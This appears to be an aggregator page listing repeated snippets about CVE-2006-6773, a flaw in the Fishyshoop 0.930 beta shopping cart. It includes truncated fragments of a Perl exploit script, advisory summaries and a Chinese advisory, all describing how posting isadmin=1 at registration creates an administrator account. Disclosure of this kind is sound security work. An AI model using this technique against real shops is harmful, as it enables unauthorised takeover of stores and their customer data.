Fishyshoop <= 0.930b Remote Add Administrator Account Exploit

No description provided by source. !/usr/bin/perl James Gray [email protected] Fishyshoop Security Vulnerability use WWW::Curl::Easy; sub usage print $0 Fishyshoop root URL Desired E-Mail Desired Password\n; exit; $FSURL=shift or usage; $UNAME=shift or usage; $PASS=shift or usage; my $fishyshoop...

fishyshoop-vuln.txt

Synopsis ======== The Fishyshoop shopping cart software contains a vulnerability which allows arbitrary users to create accounts with administrator privileges Background ========== Fishyshoop is a suite of PHP scripts allowing anybody to create an attractive online store. Affected Versions...

CVE-2006-6773

pages/register/register.php in Fishyshoop 0.930 beta allows remote attackers to create arbitrary administrative users by setting the isadmin HTTP POST parameter to 1...

CVE-2006-6773

pages/register/register.php in Fishyshoop 0.930 beta allows remote attackers to create arbitrary administrative users by setting the isadmin HTTP POST parameter to 1...

CVE-2006-6773

CVE-2006-6773 affects Fishyshoop 0.930 beta, where pages/register/register.php allows remote attackers to create arbitrary administrative users by sending is_admin=1 via HTTP POST. The vulnerability enables elevation of privileges (admin account creation) through a parameter-based bypass in the r...

FishyShoop非授权管理访问漏洞

Fishyshoop是一款网上购物软件。 Fishyshoop在处理用户请求时存在输入验证漏洞，远程攻击者可能利用此漏洞非授权获取服务的管理权限。 Fishyshoop的pages/register/register.php文件会获取每个POST变量并将变量值注入到同一名称字段下新的记录中。如果注册时isadmim变量被设置为1的话，则登录帐号就会在站点获得管理权限。 FishyShoop FishyShoop 0.930 beta 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.fishyshoop.com/...

# LiderHack.Org &amp; BhhGroup.Org &amp; Bilgi-Yonetimi.Org.Tr

No description provided by source. !/usr/bin/perl James Gray [email protected] Fishyshoop Security Vulnerability use WWW::Curl::Easy; sub usage print "$0 Fishyshoop root URL Desired E-Mail Desired Password\n"; exit; $FSURL=shift or usage; $UNAME=shift or usage; $PASS=shift or usage; my $fishysho...

Fishyshoop Security Vulnerability

Synopsis ======== The Fishyshoop shopping cart software contains a vulnerability which allows arbitrary users to create accounts with administrator privileges Background ========== Fishyshoop is a suite of PHP scripts allowing anybody to create an attractive online store. Affected Versions...

Fishyshoop 0.930b - Remote Add Administrator Account

!/usr/bin/perl James Gray Fishyshoop Security Vulnerability use WWW::Curl::Easy; sub usage print "$0 \n"; exit; $FSURL=shift or usage; $UNAME=shift or usage; $PASS=shift or usage; my $fishyshoop = new WWW::Curl::Easy; $fishyshoop-setoptCURLOPTURL, "$FSURL?L=register.register";...

Fishyshoop 0.930b - Remote Add Administrator Account

Fishyshoop 0.930b - Remote Add Administrator Account !/usr/bin/perl James Gray Fishyshoop Security Vulnerability use WWW::Curl::Easy; sub usage print "$0 \n"; exit; $FSURL=shift or usage; $UNAME=shift or usage; $PASS=shift or usage; my $fishyshoop = new WWW::Curl::Easy;...

Fishyshoop <= 0.930b Remote Add Administrator Account Exploit

Exploit for unknown platform in category web applications ============================================================= Fishyshoop \n"; exit; $FSURL=shift or usage; $UNAME=shift or usage; $PASS=shift or usage; my $fishyshoop = new WWW::Curl::Easy; $fishyshoop-setoptCURLOPTURL,...

Fishyshoop &lt;= 0.930b Remote Add Administrator Account Exploit

No description provided by source. !/usr/bin/perl James Gray [email protected] Fishyshoop Security Vulnerability use WWW::Curl::Easy; sub usage print "$0 Fishyshoop root URL Desired E-Mail Desired Password\n"; exit; $FSURL=shift or usage; $UNAME=shift or usage; $PASS=shift or usage; my $fishysho...